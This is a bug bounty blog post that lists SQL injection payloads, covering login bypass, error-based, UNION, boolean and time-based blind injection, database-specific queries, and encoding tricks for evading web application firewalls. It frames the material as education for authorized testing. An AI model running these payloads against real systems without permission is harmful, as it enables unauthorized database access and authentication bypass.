SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.
๐จ Legal Disclaimer
This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.
๐ง What is SQL Injection?
SQL Injection occurs when an attacker is able to inject arbitrary SQL code into a backend database query. This can lead to unauthorized data access, bypassing authentication, or even full system compromise.
๐ Where to Look for SQLi?
SQLi opportunities can be found in:
-
Login forms
-
Search bars
-
Product filters
-
URL parameters
-
HTTP headers (e.g.,
User-Agent
,Referer
) -
Cookies and hidden fields
๐งช Basic SQLi Payloads
These payloads test for simple injection points.
1 2 3 4 | ' OR '1'='1 ' OR 1=1 -- admin' -- ' OR '1'='1' -- |
Use these on login forms to attempt bypasses. If the app doesn’t sanitize input, you might gain unauthorized access.
๐งจ Error-Based SQLi
Use these when the server returns SQL-related error messages.
1 2 | ' AND 1=CAST((SELECT user()) AS INT)-- ' AND (SELECT COUNT(*) FROM users) > 0-- |
Look for verbose error messages like:
You have an error in your SQL syntax...
๐งฎ UNION-Based SQLi
This technique attempts to merge malicious queries with legitimate ones using UNION SELECT
.
1 2 | ' UNION SELECT null, user() -- ' UNION SELECT null, database(), version() -- |
Use ORDER BY
to find the number of columns:
1 2 | ' ORDER BY 1-- ' ORDER BY 2-- |
๐ต️ Blind SQLi (Boolean-Based)
Ideal when the application behaves differently based on true/false conditions, even without visible errors.
1 2 3 | ' AND 1=1 -- ' AND 1=2 -- ' AND SUBSTRING(@@version,1,1)='5' -- |
Watch for changes in response length or content.
⏳ Time-Based Blind SQLi
Detectable via delayed responses using SLEEP()
or WAITFOR DELAY
.
1 2 | ' OR IF(1=1, SLEEP(5), 0)-- '; WAITFOR DELAY '0:0:5'-- -- (SQL Server) |
Useful when no output is returned but the response delay reveals logic processing.
๐️ Targeting Specific Databases
MySQL
1 | ' UNION SELECT user(), database() -- |
1 | ' UNION SELECT current_user, version() -- |
1 | ' UNION SELECT system_user, @@version -- |
1 | ' UNION SELECT banner FROM v$version -- |
๐งฑ Bypassing WAFs
Use encoding, case changes, or SQL comments:
1 2 3 4 | %27%20OR%201=1-- ' oR '1'='1 '/*!UNION*/ SELECT NULL,NULL-- %27UnIoN%20SeLeCt%20null,null-- |
WAFs may block obvious patterns, but these tricks can sneak past.
๐ ️ Tools of the Trade
-
sqlmap — Automated SQLi testing tool
-
Burp Suite — With plugins like SQLiPy or Intruder for manual fuzzing
-
NoSQLMap — For MongoDB and other NoSQL targets
-
HackTricks SQLi Cheatsheet — Excellent reference
๐ฏ Pro Tips for Bounty Hunters
-
๐ Log all payloads: Always keep a record of what you tested and how.
-
๐ Try every input vector: Don’t just test URLs — check headers and cookies too.
-
๐ Understand the app logic: Knowing how queries are structured helps tailor your payloads.
-
๐ซ Respect the scope: Always stay within allowed domains/endpoints.
๐ Final Thoughts
SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.
Want to sharpen your skills? Try labs like:
-
PortSwigger Web Security Academy
-
Hack The Box
-
TryHackMe
Happy hunting, and stay ethical!
๐ Follow Me for More
๐ฌ Got a favorite payload or tool? Share it in the comments!
๐ง Subscribe for more bug bounty techniques and real-world examples.
No comments:
Post a Comment